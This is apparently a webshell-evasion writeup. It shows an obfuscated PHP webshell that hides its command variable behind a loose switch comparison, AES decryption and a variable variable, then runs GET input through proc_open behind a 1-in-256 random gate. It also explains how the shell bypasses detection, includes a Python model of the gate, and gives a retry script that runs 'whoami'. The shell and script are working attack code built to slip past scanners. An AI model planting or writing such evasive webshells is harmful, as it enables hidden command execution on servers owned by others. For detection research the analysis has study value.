1, Code
<?php
$d = True;
// switch compares with ==; a bool against a string casts the string to bool,
// so true == '1' holds and the first case is taken: $c = "AAAAA"
switch ($d) {
    case '1':
        $c = "AAAAA";
        break;
    case '2':
        $c = "BBBBB";
        break;
    case '2':               // duplicate label, never reached
        $c = "CCCCC";
        break;
    default:
        $c = "DDDDD";
        break;
}
// with key "AAAAA" this decrypts to the string "command"
$command=openssl_decrypt("4arqW4DvZ6J3t0pR2jQDaQ==", 'AES-128-ECB', $c, 0);
$descriptors = [
    0 => ['pipe', 'r'],
    1 => ['pipe', 'w'],
    2 => ['pipe', 'w'],
];
// gate: only when test() returns 0 does the variable variable $$command
// (i.e. $command itself) get overwritten with the attacker's GET parameter
if(!test()){
    $$command = $_GET['1'];
}
$process = proc_open($command, $descriptors, $pipes);
if (is_resource($process)) {
    $output = stream_get_contents($pipes[1]);
    fclose($pipes[0]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($process);
    echo $output;
}
function test() {
    $a = openssl_random_pseudo_bytes(1);   // one random byte, echoed before the command output
    echo $a;
    if ($a){            // PHP: only "" and "0" are false, so this fails only for the byte "0" (0x30)
        return 1;
    } else {
        return 0;
    }
}
?>
2, Bypass MD5: 9cc2aa3685af44c62da5a64c492c2f49
3, Detection
4, Core bypass points:
First there is a switch statement. We set $d to True; switch compares with ==, and comparing a boolean with the string '1' casts '1' to bool (true), so the first case matches and $c becomes "AAAAA". With that key, openssl_decrypt("4arqW4DvZ6J3t0pR2jQDaQ==", 'AES-128-ECB', $c, 0) yields the string "command", so $command holds the literal "command", and the variable variable $$command = $_GET['1'] overwrites $command itself with whatever is passed in the GET parameter 1.
That assignment only happens when test() returns 0. Inside test(), $a = openssl_random_pseudo_bytes(1) produces a single random byte. PHP treats only the strings "" and "0" as false, so if ($a) fails exactly when that byte is 0x30 (ASCII '0'); a NUL byte is a non-empty string and counts as true. Each request therefore has a 1/256 chance of opening the gate, after which proc_open runs the attacker-supplied command. The random byte is echoed before the command output, which is what the exploit script looks for in the response.
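The gating logic described above, modelled offline in Python so the probabilities and edge cases can be checked without a PHP host (this is an added example, not code from the original writeup). It reproduces PHP's string-to-bool rule, the loose switch comparison, the test() coin flip and the writeup's retry loop; proc_open is replaced by a constructed marker string, the decryption result is taken from the writeup ("command") rather than recomputed, and the response check is tightened to the first byte because the echoed random byte always precedes the command output:

```python
import os
from typing import Callable, Tuple

# PHP's (bool) cast on strings: only "" and "0" are false.
# A NUL byte "\x00" is a non-empty one-character string and is TRUE.
PHP_FALSY_STRINGS = {b"", b"0"}


def php_truthy(s: bytes) -> bool:
    """What PHP's `if ($s)` evaluates to for the string $s."""
    return s not in PHP_FALSY_STRINGS


def php_switch_key(d) -> str:
    """Model the switch: `switch` compares with ==, and a bool on one side
    casts the other operand to bool, so true == '1' matches the first case.
    The duplicate `case '2'` is unreachable noise."""
    cases = [("1", "AAAAA"), ("2", "BBBBB"), ("2", "CCCCC")]
    for label, key in cases:
        if isinstance(d, bool):
            matched = d == php_truthy(label.encode())
        else:
            matched = str(d) == label
        if matched:
            return key
    return "DDDDD"


def server_test(rng: Callable[[int], bytes] = os.urandom) -> Tuple[bytes, int]:
    """Model test(): draw one random byte, echo it, return 1 if PHP considers
    it truthy, else 0. Only the byte 0x30 (ASCII '0') yields 0."""
    a = rng(1)
    return a, (1 if php_truthy(a) else 0)


def success_probability() -> float:
    """Fraction of the 256 possible byte values that make test() return 0."""
    return sum(1 for b in range(256) if not php_truthy(bytes([b]))) / 256


def handle_request(cmd_param: str, rng: Callable[[int], bytes] = os.urandom) -> bytes:
    """One request to the shell: response = echoed byte + command output.
    proc_open is replaced by a constructed "<executed ...>" marker so this runs offline."""
    a, gate = server_test(rng)
    command = "command"          # writeup: openssl_decrypt(..., "AAAAA") == "command"
    if gate == 0:
        command = cmd_param      # $$command = $_GET['1'] overwrites $command itself
    # the literal "command" is not a real program; model it as producing no output
    output = b"" if command == "command" else b"<executed " + command.encode() + b">"
    return a + output


def response_indicates_success(resp: bytes) -> bool:
    """The random byte is echoed before any command output, so test the first
    byte; the writeup's `"0" in req` also fires on any '0' in the output."""
    return resp[:1] == b"0"


def attempts_until_success(cmd_param: str = "whoami",
                           rng: Callable[[int], bytes] = os.urandom,
                           max_attempts: int = 100_000) -> int:
    """Replay the retry loop offline. Success per request has p = 1/256, so the
    attempt count is geometric with mean 256. Returns -1 if the cap is hit."""
    for n in range(1, max_attempts + 1):
        if response_indicates_success(handle_request(cmd_param, rng)):
            return n
    return -1


if __name__ == "__main__":
    print("key selected by switch(true):", php_switch_key(True))
    print("P(test() == 0) =", success_probability())
    print("requests needed this run:", attempts_until_success())
```

The two fixed-rng calls in the test below are the point of the model: a generator that always returns "0" opens the gate on the first request, while one that always returns a NUL byte never does, even though both bytes "look like zero".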
5, Exploit script
import requests

url = "http://127.0.0.1/1.php?1=whoami"

# Keep requesting until the shell's test() draws the byte "0" (p = 1/256 per
# request); that byte is echoed ahead of the command output, so its presence
# in the body means the command ran.
while 1:
    req = requests.get(url=url).text
    if("0" in req):
        print(req)
        exit()
6, Screenshot of successful exploitation
7, For learning and discussion only